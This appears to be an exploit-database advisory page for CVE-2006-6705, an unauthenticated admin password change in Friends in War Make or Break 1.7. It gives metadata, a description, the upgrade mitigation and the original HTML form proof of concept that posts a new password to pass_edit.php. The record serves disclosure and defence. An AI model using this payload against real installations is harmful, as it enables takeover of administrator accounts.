Friends in War Make or Break 1.7 - Unauthenticated admin password change

vendor:

Make or Break

by:

shinnai

8,8

CVSS

HIGH

Unauthenticated admin password change

287

CWE

Product Name: Make or Break

Affected Version From: 1.7

Affected Version To: 1.7

Patch Exists: YES

Related CWE: CVE-2006-6705

CPE: o:friendsinwar:make_or_break:1.7

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: None

2006

Friends in War Make or Break 1.7 – Unauthenticated admin password change

Friends in War Make or Break 1.7 is vulnerable to an unauthenticated admin password change. An attacker can exploit this vulnerability by sending a malicious POST request to the pass_edit.php script with the username parameter set to 1 and the password parameter set to the desired new password. This will allow the attacker to change the admin password without authentication.

Mitigation:

Upgrade to version 1.8 or later.

Source

Exploit-DB raw data:

Friends in War Make or Break 1.7 - Unauthenticated admin password change

Url: http://software.friendsinwar.com/
     http://software.friendsinwar.com/downloads.php?cat_id=2&file_id=9

Author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://www.shinnai.altervista.org/
---------------------------------------------------------------------

PROOF OF CONCEPT:
<form method="post" action="http://localhost/mob/admin/pass_edit.php?username=1">
	<label>1) Choose a new password<br>2) Click on "Submit"<br>3) Login using "admin" and your new password<br><br></label>
	<input type="text" name="password" value="ChangeMe">
	<input type="text" name="submit" value="Edit+Password" hidden=true>
	<input type="submit" value="Submit">
</form>